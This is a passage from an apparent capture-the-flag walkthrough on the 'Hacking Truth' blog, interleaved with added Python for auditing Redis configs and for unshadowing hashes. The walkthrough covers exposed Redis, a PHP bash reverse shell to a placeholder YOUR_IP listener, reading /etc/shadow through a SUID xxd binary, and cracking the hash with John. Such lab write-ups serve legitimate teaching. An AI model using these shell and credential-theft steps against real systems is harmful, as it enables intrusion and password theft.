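        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted values such as rename-command CONFIG ""
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit_redis_conf(text: str) -> list:
    """Return one finding per weakness; an empty list means none were seen."""
    conf = parse_redis_conf(text)
    findings = []
    # No bind line, or a wildcard address, exposes the port on every interface.
    binds = [a.lstrip("-") for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("no restrictive bind: listens on all interfaces")
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode disabled")
    # Without requirepass, INFO, CONFIG SET and SAVE are all open to any client.
    if not any(args and args[0] for args in conf.get("requirepass", [])):
        findings.append("no requirepass: unauthenticated access")
    # rename-command CONFIG "" removes the command used to change dir/dbfilename
    # at runtime (Redis 7 additionally gates this behind enable-protected-configs).
    renamed = {a[0].upper(): a[1] for a in conf.get("rename-command", []) if len(a) == 2}
    if renamed.get("CONFIG") != "":
        findings.append("CONFIG reachable: dir/dbfilename changeable at runtime")
    return findings


# Constructed samples: the first resembles the exposed instance in the walkthrough.
WEAK_CONF = "port 6379\nprotected-mode no\ndir /var/www/html\n"
HARDENED_CONF = """bind 127.0.0.1 -::1
protected-mode yes
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG ""
dir /var/lib/redis
"""
```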

    Let’s see if we can print out the contents of the passwd file on the Linux machine; it is best to switch to ‘view-source:’ to see the raw output:

    And there we go, we have the full contents of the /etc/passwd file on the screen, and again we can see that we have a user vianka. All we need to do now is set up a listener and create a script to run a simple PHP reverse shell.

    To do this I will do the same as above in redis-cli, but this time set the key test to the following PHP reverse shell script.



    "<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"




    One important point here is that we will need to escape the double quotes inside the PHP shell script, since set test “….” already uses them, so we modify our shell code as follows:

    To capture the reverse shell I will start a pwncat listener, as it has a great deal of functionality, a bit like Meterpreter: we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts.

    And we are in as user www-data. In the /home directory we can see user vianka. Moving to vianka’s home directory we can see that we have read access to user.flag, so we can read the flag.

    A quick aside: at this point I could not clear my terminal. If the same happens to you, don't worry; typing this command sets the terminal type and you will be able to clear your terminal.

     

    export TERM=xterm 

     
    The results show a binary, xxd, with the SUID bit set and owned by root. We can probably exploit this to read a file with full root privileges. The go-to reference for Linux binary exploits is GTFOBins.

    (Screenshot of the GTFOBins entry for xxd; caption: Provided by GTFOBins)

    We found it by listing every file with the SUID bit set, using this command:


    find / -perm -u=s -type f 2>/dev/null

    Unfortunately we do not have sudo rights, but because the file has the SUID bit set we can read a file as root. It may be possible to read the shadow file, extract the hash for user vianka and see if we can brute force the hash to get the password.

    Using this technique we can print out the contents of the shadow file and copy vianka’s hash. If I can brute force the hash using John, we can simply su to user vianka.

    Brute Forcing Vianka’s Hash with John:

    To do this we create two local files, one holding the passwd entry and one holding the shadow entry; we only need to copy and paste the lines for user vianka (use single quotes so the $ characters in the hash are not expanded by the shell). We can then use the ‘unshadow’ command to merge them into a format that is readable by John.

     


    echo 'content' > local_shadow

    echo 'content' > local_passwd

    unshadow local_passwd local_shadow > hash.txt
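To make the unshadow step concrete, the Python below (an added example, not part of this walkthrough or of John) reproduces for a single user what unshadow does and picks John's --format from the hash prefix. The passwd and shadow entries are constructed placeholders, not values from the box.

```python
"""Splice the hash from a shadow(5) entry into the password field of the
matching passwd(5) entry, producing the one-line format John reads."""


def unshadow_user(passwd_text: str, shadow_text: str, user: str) -> str:
    """Return the user's passwd line with the 'x' placeholder replaced by the hash."""
    shadow_hash = None
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] == user:
            shadow_hash = fields[1]  # field 2 of shadow(5) is the crypt(3) hash
            break
    if shadow_hash is None:
        raise KeyError(f"no shadow entry for {user!r}")
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:  # passwd(5) has exactly 7 fields
            fields[1] = shadow_hash
            return ":".join(fields)
    raise KeyError(f"no passwd entry for {user!r}")


def john_format(shadow_hash: str) -> str:
    """Pick John's --format from the crypt(3) prefix; $6$ is sha512crypt,
    which is why the walkthrough ran john with --format=sha512crypt."""
    if shadow_hash in ("", "*", "!", "!!") or shadow_hash.startswith("!"):
        raise ValueError("account is locked or has no password hash")
    for prefix, fmt in (("$6$", "sha512crypt"), ("$5$", "sha256crypt"),
                        ("$1$", "md5crypt"), ("$2", "bcrypt")):
        if shadow_hash.startswith(prefix):
            return fmt
    raise ValueError("unrecognised hash prefix")


# Constructed sample entries: uid, hash and dates are placeholders, not the box's.
PASSWD = "root:x:0:0:root:/root:/bin/bash\nvianka:x:1000:1000:vianka,,,:/home/vianka:/bin/bash\n"
SHADOW = "root:!:18500:0:99999:7:::\nvianka:$6$constructedsalt$constructedhashvalue:18500:0:99999:7:::\n"
```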


    john --format=sha512crypt --wordlist=/home/hackerboy/Documents/rockyou.txt hash.txt

    Now we have the password for user vianka, so we can simply run 'su vianka' to switch to that user:

    And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before.

    Disclaimer

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal
